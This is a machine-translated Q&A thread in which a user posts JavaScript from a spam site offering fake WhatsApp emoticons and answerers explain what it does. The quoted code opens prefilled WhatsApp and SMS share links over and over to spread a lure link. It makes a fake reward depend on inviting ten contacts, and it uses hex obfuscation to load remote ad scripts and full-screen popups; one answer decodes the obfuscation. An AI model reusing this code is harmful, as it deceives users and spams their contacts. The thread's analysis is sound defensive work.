1. дома
  2. Вопрос и ответ
  3. Вредоносный сайт: дешифрование кода?

Вредоносный сайт: дешифрование кода?

2015-11-15 3 views
0

Итак, это вредоносный веб-сайт, который пытается спамить людей в распространении своего сайта дальше, что также приводит к рекламе - я предлагаю включить noscript.
http://trucchiios.com/emoticon/index_en.php
Теперь у меня есть код здесь, который выполняется, когда вы нажимаете большую кнопку whatsapp, но что она делает?Вредоносный сайт: дешифрование кода?

c = 0; 
var image; 

function fn1(x) 
{ 
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) { 
     // some code.. 
     ++c; 
     if (c <= 6) 
     { 
      window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self"); 
      if (c == 2) { 
       ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN'); 
      } else if (c == 4) { 
       ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN'); 
      } 
     } else if (c <= 10) { 
      window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self"); 
      if (c == 7) { 
       ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN'); 
      } 
      var head = document.getElementsByTagName('head').item(0); 
      var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"]; 
      var script = document[_0xc631[1]](_0xc631[0]); 
      script[_0xc631[2]] = _0xc631[3]; 
      script[_0xc631[4]] = _0xc631[5]; 
      head[_0xc631[6]](script); 
     } else 
      window.open("http://ads.sprintrade.com/adframe.php?pid=12649") 
    } else { 
     window.alert("Please invite via your mobile browser"); 
    } 
} 

function fn3(x) { 
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) { 
     // some code.. 
     ++c; 
     if (c <= 10) { 
      window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self"); 
     } else 
      window.open("http://ads.sprintrade.com/adframe.php?pid=12649") 
    } else { 
     window.alert("Please invite via your mobile browser"); 
    } 
} 

function fn2(x) { 
    if (c >= 10) 
    { 
     window.open("http://ads.sprintrade.com/adframe.php?pid=12649") 
    } else 
    { 
     window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited " + c + " contacts."); 
    } 
} 
var n = 300, 
    t = setInterval(function() { 
     $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t) 
    }, 1e3);

Я просто хотел бы, чтобы кто-то сказал мне, что он делает. Я подозреваю, что это просто реклама, а не фактическое вредоносное ПО, но, пожалуйста, загляните в нее.

источник

2015-11-15 Justin Koenig

ответ

2

Похоже, что этот код отвечает за увеличение количества спам-сообщений, полученных на прошлой неделе. Я совершенно уверен, что этот код отправляет ссылку на вредоносный веб-сайт с помощью Whatsapp веб:

window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");

При использовании мобильного устройства,

if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {

пытается также отправить SMS сообщение:

"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");

Некоторые другие сайты-аддоны загружаются при выполнении этого кода. Этот код, похоже, выполняет некоторые другие задачи, но его трудно понять. Сценарий написан с использованием Javascript.

источник

2015-11-15 18:17:49 Bustikiller

+0

Я заметил это также, что у него есть переменный счетчик, который чувствует себя как достижение - вы отправили его в (X) контакты, поздравления вот смайлик , после чего он отправляет сообщение всем своим друзьям в вашем списке друзей я предполагаю, а затем позже он направляет вас к объявлению. действительно грустно этим спамерам. это так раздражает –

2

Он добавляет файл javascript: http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp].

Полный код:

var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]  
var script = document[_0xc631[1]](_0xc631[0]); 
script[_0xc631[2]] = _0xc631[3]; 
script[_0xc631[4]] = _0xc631[5]; 
head[_0xc631[6]](script);

"Нормальный" Код:

var script = document.createElement("script"); 
script.type = "text/javascript"; 
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]"; 
head.appendChild(script);

Веб-страница .../adscript.php?pid=8673&ord=[timestamp], использование заголовка кэша , чтобы показать только один раз. На первый взгляд, вы получите:

if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; } 
else{ document.asm_max_2398++; } 

var asm_ex = false; 
var asm_ex_all = false; 
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}} 
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}} 
if(asm_ex_all){} 
else if(!asm_ex && document.asm_max_2398 <= 1) 
{ 
    document.write(''); 
(function() 
{ 
    var s, r, t; 
    r = false; 
    s = document.createElement("script"); 
    s.type = "text/javascript"; 
    s.src = "http://cdn.adspirit.de/banner/asmpop_async.js"; 
    s.readySet = false; 
    s.onload = function(){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}}; 
    s.onreadystatechange = function(){if (!this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}}; 
    function asm_pop_asmfls8673x5396511y1447611443() 
    { 
    r = true; 
    var asm_pop_options = new Object() 
    asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443"; 
    asm_pop_options.breite = "1920"; 
    asm_pop_options.hoehe = "1080"; 
    asm_pop_options.links = "0"; 
    asm_pop_options.oben = "0"; 
    asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0"; 
    asm_pop_options.layeronly = false; 
    asm_pop_options.popunder = false; 
    asm_pop_options.canlayer = false; 
    asm_pop_options.clickpop = true; 
    asm_pop_options.close = "0"; 
    asm_pop_options.booLoad = true; 
    asm_pop_options.loadTime = "2"; 
    asm_pop_options.closeTime = "0"; 
    asm_pop_options.cookdom = "sprintrade.com"; 
    asm_pop_options.poptitle = ""; 
    asm_pop_options.popdomain = "http://cdn.adspirit.de"; 
    asm_pop_options.kid = "2398"; 
    asm_pop_options.pid = "8673"; 
    asm_pop_options.id = "asmfls8673x5396511y1447611443"; 
    window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options); 
    } 
    var ss = document.getElementsByTagName("script"); 
    if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); } 
    else if(document.body){document.body.appendChild(s);} 
})() 
    document.write(''); 

} 
else 
{ 
    document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>'); 
}

После вы получите:

document.write('');

Сценарий сделать запустить только один раз.

источник

2015-11-15 18:13:36

1

Язык Javascript.

Это почти то же самое, что и ссылки mailto: (что вызывает приложение по умолчанию для электронной почты), но в этом случае он вызывает приложение WhatsApp по умолчанию или приложение SMS (в зависимости от ОС), которое затем отправляет объявление ,

(%0D%0A является строка в кодировке экранирования в течение CRLF)

Но опять же, если вы говорите, что это большая кнопка «WhatsApp», что вы ожидаете, что это делать?

источник

2015-11-15 18:15:43

Смежные вопросы

 Смежные вопросы